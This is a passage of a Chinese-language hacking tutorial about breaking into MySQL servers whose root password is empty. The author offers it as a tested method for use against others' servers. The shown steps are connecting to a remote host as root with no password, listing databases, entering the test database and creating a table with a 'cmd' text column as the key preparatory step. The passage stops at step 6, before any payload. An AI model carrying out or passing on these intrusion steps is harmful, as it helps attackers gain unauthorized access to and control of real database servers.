MYSQL用戶ROOT密碼為空時是一個很大的漏洞,在網上也有許多一些利用此漏洞的方法,一般就是寫一個ASP或PHP的後門,不僅很麻煩,而且還要猜解網站的目錄,如果對方沒有開IIS,那我們豈不沒辦法了??
後來,自己思索想到一個辦法,且在測試的幾台有此漏洞的機中均獲得了成功,現將攻擊方法公布如下:
1、連接到對方MYSQL 服務器
mysql -u root -h 192.168.0.1
mysql.exe 這個程序在你安裝了MYSQL的的BIN目錄中
2、讓我們來看看服務器中有些什麼數據庫
mysql>show databases;
MYSQL默認安裝時會有MYSQL、TEST這兩個數據庫,如果你看到有其它的數據庫那麼就是用戶自建的數據庫。
3、讓我們進入數據庫
mysql>use test;
我們將會進入test數據庫中
4、查看我們進入數據庫中有些什麼數據表
mysql>show tables;
默認的情況下,test中沒有任何表的存在。
以下為關鍵的部分
5、在TEST數據庫下創建一個新的表;
mysql>create table a (cmd text);
好了,我們創建了一個新的表,表名為a,表中只存放一個字段,字段名為cmd,為text文本。
6、在表中插入內容
